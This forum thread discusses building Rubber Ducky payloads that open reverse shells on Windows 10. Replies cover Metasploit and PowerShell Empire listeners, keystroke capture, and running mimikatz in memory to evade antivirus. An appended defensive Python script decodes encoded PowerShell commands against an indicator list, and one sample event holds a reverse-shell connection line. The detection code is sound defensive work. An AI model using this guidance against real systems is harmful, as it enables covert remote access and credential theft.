Just got my first Rubber Ducky and it quacks like a keyboard.

Looking forward to some serious pen testing.

I'm interested in the reverse shell methods.

From my understanding it connects to another computer's IP and port, and then opens up some kind of shell.

From the other computer it should be possible to run remote commands... am I getting this correct?

Questions:

1. Is it possible to listen on keystrokes with a reverse shell?

- If not, what other methods would work for the keystrokes, preferably on Win10?

2. What programs should be set up on the other end and how should they be set up?

3. Is it possible to run mimikatz through a reverse shell?

Looking forward to creating some cool payloads.

  • 2 weeks later...

I have done a reverse shell with meterpreter with a duck (all on my own machines, I can assure you :wink: ). The only real requirement is knowing how to use Metasploit's multi handler module. You can find many guides to setting one up. But by far the easiest way to set up a reverse shell with the duck is with this:

https://github.com/b00stfr3ak/Powershell-Reverse-Rubber-Ducky

As long as you have Ruby on your system (which you should have anyway if you have Metasploit installed) the program should run. All it needs is the IP that Metasploit is on and what port to look for, and it turns that into a text file that you can turn into an inject.bin file for your duck.

Unfortunately the program only opens a standard cmd window (though this can be fixed by editing the code afterwards) and the inject.bin file this program makes is 15.8KB, so if you run Twin Duck on your Rubber Ducky you're somewhat out of luck (a workaround could be hosting the raw data for the base64 code on the duck's SD card in a txt file and using Notepad to copy and paste it into PowerShell afterwards).

And as for mimikatz, meterpreter has a post module built in called kiwi. It runs the appropriate mimikatz version on the Metasploit session.

Anyway, have fun, and I'm not responsible for whatever you're going to use this knowledge for. I'm posting this for educational purposes only.

  • 3 weeks later...

1. Yes

2. Depends on what method you use to spawn the reverse shell; you have many options. You may use a simple netcat listener, a meterpreter payload handler, a PowerShell Empire payload handler, etc.

3. In the post-exploitation phase you could upload mimikatz, or, if you are using something like PowerShell Empire to spawn the reverse shell, then that functionality is built right in, and can be loaded right into memory without ever touching the disk (AV bypass).

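For defenders, the base64 PowerShell payload and the in-memory loading mentioned in the replies above leave a recognizable process-creation record. The following is an added example, not code from any poster or from the linked project: it decodes `-EncodedCommand` arguments from Sysmon-style process events and lists why an event deserves review. The indicator list, function names and sample events are assumptions constructed for illustration, as is the premise that the payload runs through an encoded PowerShell command line.

```python
import base64
import re

# Illustrative lower-case indicators of a network shell or in-memory loading.
INDICATORS = ("net.sockets.tcpclient", "downloadstring", "frombase64string",
              "invoke-expression", "mimikatz")
# Candidate "-e<letters> <base64>" pairs; the prefix check below drops
# look-alikes such as -ExecutionPolicy.
ENC_ARG = re.compile(r"(?i)\s[-/](e[a-z]*)\s+([A-Za-z0-9+/]{8,}={0,2})")

def ps_encode(script):
    """Encode text the way -EncodedCommand expects (base64 of UTF-16LE)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the script hidden in a PowerShell command line, or None."""
    for match in ENC_ARG.finditer(cmdline):
        name, blob = match.group(1).lower(), match.group(2)
        if name != "ec" and not "encodedcommand".startswith(name):
            continue
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except ValueError:  # bad base64 or bytes that are not UTF-16LE
            return None
    return None

def triage(event):
    """Return (decoded_script, reasons) for one process-creation event."""
    if not event["Image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None, []
    script = decode_encoded_command(event["CommandLine"])
    if script is None:
        return None, []
    reasons = ["encoded command"]
    reasons += [f"indicator: {i}" for i in INDICATORS if i in script.lower()]
    if event["ParentImage"].lower().endswith(("explorer.exe", "cmd.exe")):
        reasons.append("interactive parent: typed or injected keystrokes")
    return script, reasons

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed for this example, not real telemetry
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ps_encode(
         "$c = New-Object System.Net.Sockets.TCPClient('192.0.2.10', 4444)")},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "powershell.exe -ExecutionPolicy Unrestricted -File job.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage(ev))
```

The same decoding applies to PowerShell script block logging output, which records the script text even when nothing is written to disk.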
